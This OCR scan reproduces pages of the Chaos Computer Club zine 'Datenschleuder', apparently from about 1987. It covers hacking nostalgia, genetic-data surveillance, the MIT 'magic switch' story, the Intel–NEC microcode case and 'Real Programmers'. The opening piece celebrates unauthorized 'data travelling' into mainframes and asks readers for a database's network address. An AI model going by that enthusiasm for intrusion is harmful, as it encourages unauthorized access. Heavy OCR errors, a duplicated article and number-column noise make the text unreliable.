grundgeräusche wurden verdrängt, inklusive dem 
Schlüsselgeklapper des Hausmeisters, als er die 
Schulräume am Abend verschloß. Nun mußte der 
Autor notgedrungen die Nacht mit dem Rechner ver¬ 
bringen. .. nicht sehr erotisch, aber ergiebig; am 
naechsten Tag lief das Programm zwar immer noch 
nicht, aber dafuer konnte man nun auf die Assem¬ 
blerroutinen (es gab kein Pik oder Poke) zugreifen 
und das Display blinken oder ganz verschwinden las¬ 
sen. Dann gings richtig los: tagelang bei "Quelle" vor 
dem PET2001 stehen und "rumpoken", bis die Trei¬ 
ber rauchten, den Pförtner eines Rechenzentrums 
nerven usw. 

Heutzutage ist es einfacher geworden: man kaufe sich 
eine Daientoilelte, einen Komadore und dann kann 
man sich dutzende verschiedener Großrechner an 
seinen Schreibtisch holen. Vorbei die Zeit, als man 
noch zu den Operatorkonsolen schleichen mußte, um 
sich armen Programmierer mehr Privilegien geben zu 
können (und dann mit Fußtritten oder Bemerkungen 
wie "geh zurück an deinen TI-59" rausgeworfen zu 
werden). Heute sind es die Operateure, die verzwei¬ 
felt den Datex-Hacker bitten, doch bitte auch ihm ein 
paar Zugriffsrechte zu lassen ("please, give me back 
my Privileges"). Hacken wird zum Breitensport, zu 
einer modernen Form der Freizeitbeschäftigung, dem 
"Datenreisen". 

Die eigentlichen Hacker, die durch ihr Arbeitsver- 
hälinis zwar können, aber nicht dürfen, werden zu 
Datenreisenden, die nun anonym ihr Wissenspoten¬ 
tial so richtig auskosten können. Homecomputer¬ 
freunde können sich im Rahmen ihrer bescheidenen 
Möglichkeiten auch Kenntnisse von Großrechnern 
aneignen. Aber kaum hat dieser neue Sport an Attrak¬ 
tivität gewonnen, wird er ins kriminelle Abseits ge¬ 
drängt. Die neuen Hackergeselze aber betreffen nicht 
nur den Datenreisenden, sondern auch die "alten" 
Hacker. Eine mit Kaugummi verklebte Lochkarte 
wird zum Präzedenzfall, Mailboxen zu verschwöreri¬ 
schen "Underground- Medien". 

Und dann wäre da Ja noch die neue Gebührenpolitik 
des Gilb in Bezug auf Dalex-P zu nennen, noch viel 
wirkungsvoller als die neuen Gesetze. Wer kann sich 
das denn ab April noch leisten? Das Datenreisen, 
kaum im Kommen, wird sang-und klanglos im NIL 
verschwinden. Auch für kommerzielle Mailboxbe- 
ireiber brechen harte Zeiten an, denn die Online-Zci- 
ten werden sich verringern und von 10.- DM im Mo¬ 
nat kann keinerauf Dauer existieren. Traurig, traurig, 
die CeBit wird wohl die letzten "Hacksessions" mit 
sich bringen, denn wenn etwas Geld kostet, dann 
macht es erfahrungsgemäß nicht mehr so viel Spaß. 
Es wird Zeit, daß auch in unseren Cornflake.spac- 
kungen kleine Plastikspielzeuge gefunden werden 
(vielleicht gleich mit FTZ-Nummer?)! 

Übrigens: falls einer die Nua der in der Einleitung 
genannten Datenbank hat (lechz!), möge ersieh doch 
bitte bei uns melden, no pasaran! FRIMP:-) 

S>le S>atcn^ cl^ Ccubcr 


Feature: 


Der genetisch gläserne Mensch 
Erbsubstanz in der Rasterfahndung 

75431 3<?9'?7 22170 38044 17092 39457 

Hamburg (ds) - Als die Kostenexplosion im Gesund¬ 
heitswesen 1978 öffentliches Thema wurde, betrugen 
die Gesamtausgaben für Gesundheit über 165 Mil¬ 
liarden Mark oder rund 20 Prozent des verfügbaren 
Einkommens privater Haushalte. "Koslendämp- 
fung" wurde zum gängigen Schlagwort der Diskus¬ 
sion, verbunden mit kontroversen Auseinanderset¬ 
zungen über Ausgestaltung und Konsequenzen des 
beabsichtigten Sparkurses. Wesentliche Vorausset¬ 
zung der angepeilten Steuerungsversuche war die 
"Verbesserung der Datcnlage", heißt, die Kassen, die 
sich zudem mit einem wachsenden Anteil an chroni¬ 
schen, sozial- und umweltbedingten Krankheiten 
konfrontiert sahen, konstatierten einen wesentlich 
erhöhten Bedarf an Sozial- und Gesundheitsdaten. 
Geplant’wurde ein maschinenlesbarer Versicherte¬ 
nausweis der mit ebenfalls maschinenlesbaren For¬ 
mularen gekoppelt werden sollte. Ein neu einzufüh¬ 
render Paragraph 319 der Reichsversicherungsord- 
nung(RVO),soiltedie rechtlichen Grundlagen dieses 
sogenannten "Transparenzprojektes" .schaffen. Nach 
einer Felderprobung in Schleswig-Holstein wurde 
das Vorhaben jedoch zunächst verworfen. Allerdings 
nicht aus daienschuizrechtlichen, sondern vor allem 
wegen ökonomischer Bedenken. 


Gen-jAnaiyse_öffenUicliej:_Gesundheitsvorsorße 
42434 569S4 40187 33128 ' r0i07 94512 

Allgemein stellt sich die Frage, wer in welchem Um¬ 
fang Daten der öffentlichen Gesundheitsfürsorge 
oder kassenärztlichen Abrechnung erheben und of¬ 
fenbaren darf. Wer, zu welchen Zweck Zugriff be¬ 
kommt - und, unabhängig von solchen formalen Kri¬ 
terien, welche Schlussfolgerungen aus dem Datenma¬ 
terial von wem zu welchem Zweck gezogen werden. 
Kritiker versichern, dass beispielsweise in der Ham¬ 
burger Gesundheilsbehörde und dem Tumorzentrum 
in Hamburg Eppendorf eine Behindertenkartei ge¬ 
führt werde, in der ca. 2000 Menschen erfasst sind. 
Erkennbare Fehlbildungen bei der Geburt werden 
automatisch beim Statistischen Bundesamt in Wies¬ 
baden ausgewertet. Aus anderen Unterlagen gehe 
hervor, daß in Europa alle Mißbildungen nach ein¬ 
heitlichen Kriterien erfasst werden sollen. 

Nach Auffassung von Prof. Dr. Bernd Klees, werde 
eine umfassende prä- und postnatale genetische An¬ 
alyse in naher Zukunft die Grundlage individueller 
Gen-Karten und zentralisierter Genkarteien liefern, 
die die Mehrzahl unserer Bevölkerung einer totalen 
Kontrolle unterwerfen werde. "Das Konstrukt der 
'informationeilen Selbstbestimmung”', so Klees, 
"wird dann nur noch eine hilflose Verteidigungslinie 
sein. Die 'Volkssählungsdebatte' wäre gegen über den 
'Gen- Debatte' nur ein gleichsam harmloses Prälu¬ 
dium". Die bayrischen Vorstöße zur AIDS- Meldep¬ 
flicht, geben einen Vorgeschmack auf künftige Ent¬ 
wicklungen. 


Kosten-Nutzen-Rechnungen 
mit Daten über Erbgu t? 

90962 71662 26074 C71 87 4'9975 35921 

Der dahinter stehende Wunsch nach detaillierten In¬ 
formationssystemen ist damit aber nicht vom Tisch. 
Im' Gegenteil! Dem Kassenarzt werden unter Beru¬ 
fung auf Paragraph 368 RVO bereits über 80 vorge¬ 
druckte Bescheinigungen und detaillerte Berichte 
über seine Patienten abverlangt, was im Einzelfall 
bedeuten kann, daß der Patient vor der Alternative 
sieht, entweder auf die Wahrung seiner Intimdaten 
oder auf wirksame Hilfezu verzichten. 


Die Forderung nach mehr Effektivität und Effizienz 
hat auch im Gesundheitswesen zunehmend Kosten- 


Nutzen- Rechnungen aufkommen lassen. Der Prä- 
ventivmedizin wurde wachsende Bedeutung beige¬ 
messen. Der steigende Anteil umweltbedinger 
Krankheiten hat zudem eine neue medizinische Dis¬ 
ziplin auf den Plan gerufen, die sogenannte ökogene- 
tik. Sie untersucht Wechselwirkungen zwischen Erbe 
und Umwelt, insbesondere Wirkungen potentiell 
erbgutverändernder Stoffe auf die genetische Konsti¬ 
tution des Menschen. Anläßlich eines vom For- 


schungsministerium initiierten Fachgesprächs im 
Herbst 1983, vertraten die Hamburger Humangeneti¬ 
ker Prof. Werner Gödde und Prof. Dharam Agarwal 
die Auffassung, daß die Erfassung der genetischen 
Konstitution generell immer wichtiger erscheine. Sie 
empfahlen einen sogenannten Pharmakogenetik- 
Pass, der, nach dem Prinzip der Unfallschutzkarten, 
dem behandelnden Arzt Anhaltspunkte über indivi¬ 
duelle Anfälligkeiten oder Resistenzen gegenüber be¬ 
stimmten Substanzgruppen geben soll. 


Gen-Analyse im ArbeitslebcTi 
72237 37ä96 l26ö5 5U54 6?^ 71439 

Auch wenn dieser Vorschlag zunächst auf verhalte¬ 
nen Beifall stieß, im Rahmen berufsgenossenschaftli¬ 
cher Untersuchungen wird die genetische Analyse 
durch Betriebsärzte zunehmend zur Alltagsroutine 
werden. Nach Auffassung von Dr. Breitstadt. Werk¬ 
sarzt der Firma Höchst, wäre anbetracht der speziel¬ 
len Arbeitsplatzrisiken im Sinne des derzeitigen be¬ 
rufsgenossenschaftlichen Regclwcrkcs eine Dul¬ 
dungspflicht genetischer Untersuchungen anzusire- 
ben. 

Ein grundsätzliches Recht des Arbeitgebers, vor Ein¬ 
stellung ärztliche Untersuchungen zu verlangen, wird 
nach derzeitiger Rechtslage nicht bestritten - zumin¬ 
dest nicht wenn es darum geht, Arbeitsplatzrisiken zu 
erkennen. Zu erwarten ist, dass in Parallelität zum 
psychologischen in Kürze auch genetische Eignung- 
stesls eingeführt werden. Auf dieser Grundlage wer¬ 
den Arbeitsgerichte in erster Linie über Grenzen der 
Zumutbarkeit zu befinden haben. Betont wird, dass 
genetische Untersuchungen im Arbeitsleben grund¬ 
sätzlich auf Freiwilligkeit der zu Untersuchenden be¬ 
ruhen sollte. 

Alternativen gesucht 

4 1 278 88732“ 52737 339^ r2a90 506B4 

In einem Schreiben an den Vorsitzenden der 
Enquete-Kommi.ssion Gentechnik hat die Bundesve¬ 
reinigung der Huntington-Gruppen in der Bundesre¬ 
publik bereits im Februar darauf bestanden, daß aus¬ 
schließlich der Patient die Daten seiner genomanaly¬ 
tischen Untersuchung verwahren bzw. verwenden 


27560 

84414 

73782 

33032 

70330 

1 6823 

7193b 

43002 

17323 

5734? 

359 4 7 

56 4 33 

41299 

43024 

35023 

57322 

14597 

34328 

26414 

216S4 

37S72 

1 ti t -j -j 

67010 

61509 


53241 38062 79602 59303 37727 69778 
37923 68409 32536 53807 33983 45721 
37460 21005 31143 33513 23850 04782 
71693 76213 00490 47955 97959 29059 


S>te S>atem^c]^lewber 





Feature: 

Der genetisch gläserne Mensch 
Erbsubstanz in der RasteHahndung 

75631 39997 22170 33046 17092 99457 

Hamburg (cls) - Als die Kostcncxplosion iiii Gesund¬ 
heitswesen 1978 ölTeniliches Thema wurde, betrugen 
die Gesamtausgaben für Gesundheit über 165 Mil¬ 
liarden Mark oder rund 20 Prozent des verfügbaren 
Einkommens privater Haushalte. "Kostendämp- 
fung" wurde zum gängigen Schlagwort der Diskus¬ 
sion, verbunden mit kontroversen Auseinander.set- 
?:ungcn über Ausgestaltung und Konsequenzen des 
beabsichtigten Sparkurses. Wesentliche Vorau.sset- 
zung der angepeilten Steuerungsversuche war die 
“Verbesserung der Datenlage“, heif3l. die Kassen, die 
sich zudem mit einem wachsenden Anteil an chroni¬ 
schen. sozial- und umweltbedingten Krankheiten 
konfrontiert sahen, konstatierten einen wesentlich 
erhöhten Bedarf an Sozial- und Gcsundheiisdalen. 
Geplant'wurde ein maschinenlesbarer Versicherie- 
nausweis der mit ebenfalls maschinenlesbaren For¬ 
mularen gekoppelt werden sollte. Ein neu cinzufüh- 
render Paragraph 319 der Rcichsversicherungsord- 
nung (RVO), sollte die rechtlichen Grundlagen dieses 
sogcnanT^ten' Trunsparenzprojekies“ schaffen. Nach 
einer Felderprobung in Schleswig-Holstein wurde 
das Vorhaben jedoch zunächst verworfen. Allerdings 
nicht aus datenschutzrechtlichcn. sondern vor allem 
wegen ökonomischer Bedenken. 

ost en-N ulzcn-Rechnungen 

mit_paien über Erbgut? 

90962 716ö2‘26Ö74'07ia7 49975 35921 

Der dahinter stehende Wunsch nach deiailhericn (n- 
formalionssysiemen ist damit aber nicht vom Ti.sch. 
Im Gegenteil! Dem Kassenarzt werden unter Beru¬ 
fung auf Paragraph 368 RVO bereit.s über 80 vorge¬ 
druckte Bescheinigungen und detalllerte Berichte 
über seine Patienten abverlangi. was im Einzelfall 
bedeuten kann, daß der Patient vor der Alternative 
steht, entweder auf die Wahrung seiner Inlimdaten 
oder auf wirksame Hilfe zu verzichten. 

Oie Forderung nach mehr Effektivität und Effizienz 
hat auch im Gesundheitswesen zunehmend Kosten- 
Nutzen- Rechnungen aufkonimcn lassen. Der Prä¬ 
ventivmedizin wurde wach.sende Bedeutung beige- 
mes.sen. Der steigende Anteil umweltbedinger 
Krankheiten hat zudem eine neue medizinische Dis¬ 
ziplin auf den Plan gerufen, die sogenannte ökogene- 
lik. Sie untersucht Wechselwirkungen zwischen Erbe 
und Umwelt, in.sbesondcre Wirkungen potentiell 
erbgutverändernder Stoffe auf die genetische Konsti¬ 
tution des Menschen. Anläßlich eines vom For- 
schungsministerium initiierten Fachge.sprüch.s im 
Herbst 198.3, vertraten die Hamburger Humangeneti¬ 
ker Prof, Werner Gödde und Prof. Dharam Agarwal 
die Auffassung, daß die Erfassung der genetischen 
Kon.stitution generell immer wichtiger erscheine. .Sie 
empfahlen einen .sogenannten Pharmakogenetik- 
Pas.s. der, nach dem Prinzip der Unfalischutzkarten. 
dem behandelnden Arzt Anhaltspunkte über indivi¬ 
duelle Anfälligkeiten oder Resistenzen gegenüber be¬ 
stimmten Substanzgruppen geben soll. 

27560 B441'5 73732 j3ö- 32 70.330 löd23 

71?.3ö 43302 1 7.323 57.349 3594 7 564.33 

4129? 4.3024 950:3 57.3:: J 4597 34320 

;'64I4 37S72 1L7Z: 67010 61509 

X>aten^c^leuber 



Gen-Analyse öffentlicher Gesuiidheiisvorsorßc 
4243A 56984 40187 33128 10107 94512 

/Mlgemein stellt sich die Frage, wer in welchem Um¬ 
fang Daten der öffentlichen Gesundheitsfürsorge 
oder kassenärztlichen .Abrechnung erheben und of¬ 
fenbaren darf. Wer, zu welchen Zweck Zugriff be¬ 
kommt - und, unabhängig von solchen formaien Kri¬ 
terien, welche Schlussfolgerungen aus dem Datenma¬ 
terial von wem zu welchem Zweck gezogen werden. 
Kritiker versichern, dass beispielsweise in der Ham¬ 
burger Gesundheitsbehörde und dem Tumorzenirum 
in Hamburg Eppendorf eine Behinderienkartei ge¬ 
führt werde, in der ca. 2000 Menschen erfa.sst sind. 
Erkennbare Fehlbildungen hei der Geburt werden 
automatisch beim Statistischen Bundesamt in Wies¬ 
baden ausgeweriet. Aus anderen Unterlagen gehe 
hervor, daß in Europa alle Mil3bildungen nach ein¬ 
heitlichen Kriterien erfasst werden sollen. 

Nach Auffassung von Prof. Dr. Bernd Klees, werde 
eine umfassende prä- und postnatale genetische An¬ 
alyse in naher Zukunft die Grundlage individueller 
Gen-Karten und zentralisierter Genkarteien liefern, 
die die Mehrzahl unserer Bevölkerung einer totalen 
Kontrolle unterwerfen werde. “Das Konstrukt der 
■informationellen Selbstbestimmung’“, so Klees, 
■'wird dann nur noch eine hilflose Verteidigungslinie 
sein. Die’Volkssählungsdebatie' wäre gegen über den 
'Gen- Debatte' nur ein gleichsam harmloses Prälu¬ 
dium“. Die bayrischen Vorstöße zur AIDS- Mcidep- 
nicht, geben einen Vorgeschmack auf künftige Ent¬ 
wicklungen. 

Gcn-Analvse im Arbeitslcbcu 
72237 37336'12605 81656 ^053 71439 

Auch wenn dic.ser Vorschlag zunächst auf verhalte¬ 
nen Beifall stieß, im Rahmen berufsgenosscnschaftli- 
eher Untersuchungen wird die genetische Analyse 
durch Beiricbsärzte zunehmend zur Alltagsroutme 
werden. Nach Auffassung von Dr. Breilstadt. Werk- 
sarzt der Firma Höchst, wäre anbetrachl der speziel¬ 
len Arbeiisplatzrisiken im Sinne des derzeitigen be- 
rufsgenos.sen.schaftlichen Regelwerkes eine Dul- 
dungspflichl genetischer Untersuchungen anzusire- 
hen. 

Ein grundsätzliches Recht des Arbcilgehers. vor Ein¬ 
stellung ärztliche Untersuchungen zu verlangen, w’ird 
nach derzeitiger Rechi.slage nicht bestrillen - zumin¬ 
dest nicht wenn es darum geht, Arbeiisplatzrisiken zu 
erkennen. Zu erwarten ist. dass in Parallelität zum 
psychologischen in Kürze auch gencti.sche Fignung- 
stests eingeführt werden. Auf dieser Grundlage wer¬ 
den Arbeitsgerichte in erster Linie über Grenzen der 
Zumutbarkeit zu befinden haben. Betont wird, dass 
genetische Untersuchungen im Arbeitsleben grund¬ 
sätzlich aufFreiw'illigkeit der zu Untersuchenden be¬ 
ruhen sollte, 

Alternativen gesucht 

61773 ag732^27:.7 38903 r2390 50606 

In einem Schreiben an den Vorsitzenden der 
Enquete-Kommission Gentechnik hat die Bunde.sve- 
reinigung der Huntington-Gruppen in der Bundesre¬ 
publik bereits im Februar daraufbe-standen, daß au.s- 
-schließlich der Patient die Daten seiner genomanaly- 
lischen Untersuchung verwahren bzw. verwenden 
53241 33D62 79602 59.303 3772? 69779 

.37923 69409 .325-36 53907 -33983 4572J 

374i0 JH43 2:a5e 34732 

76213 00490 47955 97959 27059 


Der magische Schalter 

aus: FORTHTREE Hamburg 

Vor ein paar Jahren schnüffelte ich in den 
Vitrinen, in denen die PDP-10 des MIT Artificial 
Intelligence Lab' untergebracht war, und ich 
bemerkte einen kleinen Schalter, der an den 
Rahmen einer der Vitrinen geklebt war. Es war 
offensichtlich ein in Heimarbeit zusammenge¬ 
basteltes Ding, das einer der Hardware Hacker 
des Labors (keiner wußte, wer) angebracht 
hatte. 

Man faßt keinen unbekannten Schalter an 
einem Computer an ohne zu wissen, was pas¬ 
siert, denn man könnte einen Absturz herbei¬ 
führen. Der Schalter war auf höchst unh ilfreiche 
Weise beschriftef. Es gab zwei Stellungen, und 
mit Bleistift war auf das Metall des Schalters 
gekritzelt “magic" und “more magic“. Der Schal¬ 
ter war auf "more magic“ gekippt. Ich bat einen 
anderen Hacker, sich das anzusehen. Auch er 
hatte den Schalter noch nie gesehen. Eine 
genauere Untersuchung ergab, daß bloß EIN 
Draht zudem Schalterführte! Das andere Ende 
des Drahts verschwand in der Leitungswirrnis 
im Inneren des Computers, aber es ist eine 
grundlegende Tatsache von Elektrizität, daß 
ein Schalter nichts bewirkt, so lange nicht ZWEI 
Drähte an ihm angeschlossen sind. Dieser 
Schalter hatte einen Draht, der an der einen 
Seite angeschlossen war, und keinen Draht an 
der anderen Seite. 

Es war klar, daß dieser Schalter irgendjeman¬ 
des Vorstellung von einem billigen Witz ent¬ 
sprungen war. Bestärkt in unserer Überzeu¬ 
gung, daß der Schalter unwirksam war, legten 
wirihn um. Der Computer stürzte augenblicklich 
ab. 

Man stelle sich unser vollkommenes Erstaunen 
vor. Wir verbuchten es als Zutall, kippten aber 
nichtsdesfotrotz den Schalter auf die “more 
magic“-Position, bevor wir den Computer wie¬ 
der hochfuhren. 

Ein Jahr später erzählte ich die Geschichte 
einem anderen Hacker - David Moon, wenn ich 
mich recht erinnere. Er zweifelte natürlich an 
meinem Verstand oder nahm an, ich würde an 
eine übernatürliche Macht in diesem Schalter 
glauben, beziehungsweise erdachte, ich toppe 
ihn mit einem Märchen. Um ihn zu überzeugen, 
zeigte ich ihm den Schalter, der immer noch an 
derselben Stelle angeklebf war, mit bloß einem 
Draht, der zu ihm führte. Er war immer noch in 
der “more magic“-Stellung. Wir prüften den 
Schalter und seine einsame Verbindung und 
fanden, daß das andere Ende des Drahts, fest 
verbunden mit der Computerverdrahtung, mit 
einem ground pin verbunden war. Das machte 

X>CLten4cl^teuber 


den Schalter doppelt nutzlos: er war nicht nur 
elektrisch inoperabel, sondern auch noch ver¬ 
bunden mit einem Teil, das niemals irgendwie 
oder irgendwas bewirken würde. Also legten wir 
den Schalter um. 

Der Computer stürzte augenblicklich ab. 

Diesmal gingen wir zu Richard Greenblatt, 
einem allgedienten MIT- 
Hacker, der grade da war. Auch ihm war der 
Schalter nie zuvor aufgefallen. Er inspizierte 
ihn, kam zu dem Schluß, daß er nutzlos ist, 
brachte einen Seitenschneider und machte ihn 
raus. Anschließend fuhren wir den Rechner 
hoch und alles lief wie geschmiert. 

Wir wissen immer noch nicht, wie der Schalter 
die Maschine zum Absturz brachte. Es gibt eine 
Theorie, daß ein vernachlässigbar kleiner 
Strom an dem ground pin herrscht und das 
Umlegen des Schalters die elektrische Leistung 
genügend verändert, um den Strom soweit zu 
beeinträchtigen, daß Millionstelsekunden- 
Pulse durchlaufen. Aber wir sind nicht sicher. 
Alles was wir sagen können ist, daß der Schal¬ 
ter magisch war. 

Ich habe den Schalter immer noch bei mir zu 
Hause. Vielleicht bin ich verrückt, aber ich habe 
ihn gewöhnlich auf “moie magic“ gekippt. 

Übersetzung ins Deutsche von Peter Glaser. 


77751 

9329? 94213 

72772 

11253 

34 360 

37158 

34 335 ö 2 6 9 6 

16619 

8B572 

52661 

22Ci7 

9754B 62106 

20836 

49382 

91045 

47.152 

01529 93209 

25030 

0549B 

25704 


Laserbriefe 

An die 

Redaktion “Bratenschleuder“ 

Chaos Computer Club 

Sehr geehrte Redaktion “Bratenschleuder", 

Hiermit bestelle ich das Programmpakettürden 
C64 zu 2.50 DM. 

Das Programmpaket enthält: 

Tomatomat Plus 
1-2-Dry 
Tea Base I 

2,50 DM liegen in Briefmarken bei. 

PS.: Bin begeisterter Computer-Freak! 



Neue Runde im Prozessorkrieg 

Ende Septmeber letzten Jahres feierte Silicon Valley 
einen großen Sieg. In dem Copyright-Prozeß zwi¬ 
schen Intel und NEC mit Intel als Kläger hatte Rich¬ 
ter William A. Ingram vom District Court in San Jose 
endlich ein Urteil gefällt. Er erklärte, wie Intel bean¬ 
tragt hatte, den Microcode von Microprozessoren als 
Software. Damit fiel er unter das amerikanische Co¬ 
pyright. Alle Intel-Prozessoren der acht-, sechzehn- 
und zweiunddreißig-Bit-Klasse, weltbekannt unter 
den Zifferncodes 8088,8085,80186, 80286 und 80386, 
dürfen laut Ingrams Spruch nicht derart nachemp¬ 
funden werden, daß sie mit den Intel-Produklen 
kompatibel sind. 

Damit erklärte der Richter die als V-Serie eingeführ- 
len Eigenentwicklungen von NEC zu Makulatur, 
zumindest für amerikanisches Territorium. "Alle 
künftigen Produkte mit einem Microcode dürfen 
nicht kopiert werden", so machte Intel-Anwalt F. 
Thomas Dunlap die Tragweite des Urteils deutlich. 
Die Japaner, reich an Speichern, arm an Logik, zogen 
daraus Schlußfolgerungen, wie sie ihrem flexiblen 
Wesen entsprechen: Sie fragten nach Lizenzen an. 
Doch was im Zuge der Verkaufswelle für die 16-Bit- 
CPU’s noch möglich war, ist im anlaufenden 32-Bit- 
Geschäfl ein Tabu. War Hitachi noch vor Motorola 
Fujitsu wie auch Mitsubishi und Oki Electric noch 
von Intel großzügig mit Second-Source- Lizenzen für 
den Kampf um die Ausbreitung der beiden amerika¬ 
nischen 16-Bit-Welten bedacht worden, so ist der Li¬ 
zenzladen für die Mächtigen - vorerst - geschlossen. 
Hier haben Motorola einen Markanteil von 57 Pro¬ 
zent, und Intel bereits 30 Prozent zu verteidigen. 

Die Prozessoren selber generieren zwar nur relativ 
geringen Umsatz. So kostet die frisch auf den Markt 
geworfene32-Bit CPU 80386 von Intel derzeit um die 
400 Dollar, dürfte aber bald in höheren Stückzahlen 
auf250, und in fünf Jahren auf 25 Dollar fallen. Doch 
nicht der Prozessor selber ist das entscheidende Ge¬ 
schäft, sondern die Halbleiterperipherie, die er 
kreiert. Mit ihr muß ersieh verstehen, und so müßten 
sich auch Fremdarbeiter an die Spielregeln eines 
Produktes halten, auf das sie keinen Einfluß haben. 



Die Japaner ließen sich von Richter Ingram nicht ins 
Bockshorn Jagen. Hitachi und Fujisu beschlossen 
Ende Oktober letzten Jahres kurzerhand, selber in 
dieses mühsame Geschäft einzusteigen. Nicht wegen 
der Technologie ist die Prozessor-Produktion so ver¬ 
trackt. Die Missionsarbeit für das passende Betriebs- 
.system macht wegen ihres ungewissen Ausgarigs das 
Prozessorgeschäft so risikoreich. Dabei sind die Vor¬ 
aussetzungen für einen 32-Bit-Prozessor in Japan na¬ 
hezu ideal. Die Insel - gilt mit rund vier Millionen In¬ 
stallation - als ein Workstation-Wunderland, in dem 
unweigerlich Motorola und Intel den Ton angeben 
würden. Der Markt wäre also vorhanden. Nur bei 
dem Betriebssystem, das der neue Typ des Joint- Ven- 
ture.s unterstützen soll, herrscht noch Unklarheit. Von 
einer Unix-Schnittstelle ist die Rede, aber auch von 
TRON (The Real-Time Operating System Nucleus), 
das als 'revolutionär' gepriesen wird und besonders 
auf japanische Bedürfnisse (Mehrspi;achenverabei- 
tung) zugeschnitten sein soll. Auch die technischen 
Grunddaten werden bereits gehandelt: 700000 Tran¬ 
sistoren. 128 -KB-Stack-Cache, l-KB- Instructions- 
Cache, 16 Register und 64 MB Hauptspeicher. 
Allerdings geisterte im Gefolge des Prozesses zwi¬ 
schen NEC und Intel auch schon ein 32-Bil Micro- 
prozessor als Originalentwicklung von NEC. Nach 


seiner technischen Beschreibung wäre er unschlagbar 
gewesen. Aber Hitchi und Fujitsu scheinen der Reali¬ 
tät näher zu sein. Wenn Fujitsu sich zu 80 Prozent bei 
Fairchild einkaufen darf, ist ein ausgereifter 32-Bit- 
Prozessor in diesem Halbleiter- Einkaufskorb enthal¬ 
ten. a. nony 

CPUKRI19.DOC 19870.126 14.10 


33905 

53570 

16865 

31205 

26495 

61485 

72492 

57386 

20691 

74036 

95213 

53375 

25316 

66345 

46658 

85972 

86659 

45113 

64413 

70331 

39367 

21185 

f>9553 

95210 

84594 

07244 

32383 

55860 

63186 

80696 

49248 

51252 

63269 

95146 

03596 

03729 

72531 

98368 

42336 

39046 

32136 

71011 

61928 

21711 

15028 

28016 

04438 

05880 

23820 

31981 

49309 

63695 

96735 

93274 

20249 

88245 

68494 

12738 

60566 

49135 

25267 

06046 

23445 

05492 

275BI 

15170 

93149 

21879 

59271 

30019 

40968 

86698 

69370 

37302 

20047 

53143 

38191 

09278 

80300 

1 7205 

93553 

05207 

00706 

07223 


Real Programmers Don’t Use PASCAL 

A.FtLue 

Im Goldenen Zeilalter des Computerns war es 
einfach, die Männer (bisweilen richtige Män¬ 
ner' genannt) von den Bubis (bisweilen ’Müs- 
lifresser’ genannt) zu unterscheiden. Zu dieser 
Zeit waren die Richtigen Männer die, die etwas 
vom Programmieren verstanden und die Müs¬ 
lifresser die, die nichts kapierten. Ein Richtiger 
Computerprogrammierer sagte Sachen wie: 
“D0101=1,10“ und: “ABEND,“ und der Rest der 
Welt sagte: “Computer sind mir zu kompliziert“ 
und: "Ich habe keine BEZIEHUNG zu Compu¬ 
tern - sie sind so unpersönlich“. Ein voraus¬ 
schauendes Werk, B.Feirstein’s “Richtige Män¬ 
ner essen kein Müsli“, ein Taschenbuch aus 
dem Jahre 1982, wies darauf hin, daß Richtige 
Männer sich auf nichts beziehen und au ßerdem 
keine Angst davor haben, unpersönlich zu sein. 

Aber die Zeiten ändern sich. Heute sehen wir 
eine Welt, in der kleine ältere Damen einen 
computerisierten Mikrowellenherd haben, 
zwölfjährige Kids einen Richtigen Mann bei 
Asteroids oder PacMan spielend in die Tasche 
stecken, und jedermann seinen höchstper¬ 
sönlichen Personal Computer kaufen und ver¬ 
stehen kann. Der Richtige Programmierer droht 
von Studenten mit TRASH-80em deklassiert zu 
werden! 

Es gibt, wie auch immer, Unterschiede zwi¬ 
schen dem typischen jugendlichen PacMan- 
Spieler und einem Richtigen Programmierer. 
Diese Unterschiede zu begreifen, könnte den 
Kids eine Perspektive geben - ein Persönlich¬ 
keitsbild, eine Vaterfigur. Außerdem würde es 
deutlich machen, daß weiterhin Richtige Pro¬ 
grammierer gebraucht werden. 

S>aten^cl^Cewber 


Der einfachste Weg, um zu bestimmen, wer die 
Richtigen Program 

mierer sind, geht über die Programmierspra¬ 
che, die sie verwenden. Richtige Program¬ 
mierer verwenden FORTRAN. Müslifresser 
verwenden Pascal. Nicklaus Wirth, der Erfinder 
von Pascal, wurde einmal gefragt “Wie spre¬ 
chen Sie Ihren Namen aus?“. “You can either 
call me by name, pronouncing it 'Veert', or call 
me by value, 'Worth'“, sagte er. Man kann aus 
dieser Antwort unmittelbar ersehen, daß Nic¬ 
klaus Wirth ein Müslifresser ist. Die einzige 
Form der Werteübergabe, die ein Richtiger Pro¬ 
grammierer gutheißt, ist call-by-value-return, 
wie es in den IBM/370 FORTRAN G- und H- 
Compilern implementiert ist. Richtige Pro¬ 
grammierer haben keine abstrakten Konzepte 
nötig, um ihre Arbeit zu erledigen; sie sind 
vollkommen glücklich mit einer Lochkarten¬ 
stanze, einem FORTRAN IV-Compiler und 
einem Bier. Richtige Programmierer program¬ 
mieren Listenverwaltunq, Strinqmanipulation, 
Buchführung (falls sie es überhaupt machen) 
und Künstliche Intelligenz in FORTRAN. 

Wenn Du es nicht in FORTRAN machen 
kannst, mach es in Assembler, Wenn Du es 
nicht in Assembler machen kannst, ist es nicht 
wert, gemacht zu werden. 

Akademische Informatiker sind in den letzten 
Jahren zunehmend dem strukturierten Pro¬ 
grammieren verfallen. Sie sagen, daß Pro¬ 
gramme viel einfacher zu verstehen sind, wenn 
man spezielle Techniken und Sprachkon- 
struktionen benutzt. Welche Konstruktionen 
genau, darüber sind sie sich nicht ganz einig, 
und die Beispiele, die sie bringen, um ihre 
Ansichten zu belegen, passen immer auf je¬ 
weils eine Seite irgendeiner obskuren Zeit¬ 
schrift, 

Als ich mit der Schule fertig war, dachte ich, daß 
ich der beste Programmierer der Welt bin. Ich 
konnte ein unschlagbares Tic-Tac- 
Toe-Programm schreiben, fünf verschiedene 
Programmiersprachen verwenden und 1000 
Zeilen lange Programme abtassen, die funk¬ 
tionierten. Dann geriet ich ins Richtige Leben 
hinaus. Meine erste Aufgabe war, ein 200.000 
Zeilen langes FORTRAN-Programm zu lesen 
und zu verstehen, um es anschließend um 
einen Faktor zwei zu beschleunigen. Jeder 
Richtige Programmierer wird dir sagen, daß 
kein strukturierter Code der Welt dir dabei hel¬ 
fen wird, ein Problem wie das zu lösen - dazu 
braucht man wirkliches Talent. 

Einige Anmerkungen zu Richtigen Program¬ 
mierern und strukturierter Programmierung: 


-Richtige Programmierer haben keine Angst, 
GOTO's zu verwenden; 

-Richtige Programmierer können fünf Seiten 
lange DO-Schleiten schreiben ohne nervös zu 
werden; 

-Richtige Programmierer lieben arithmetische 
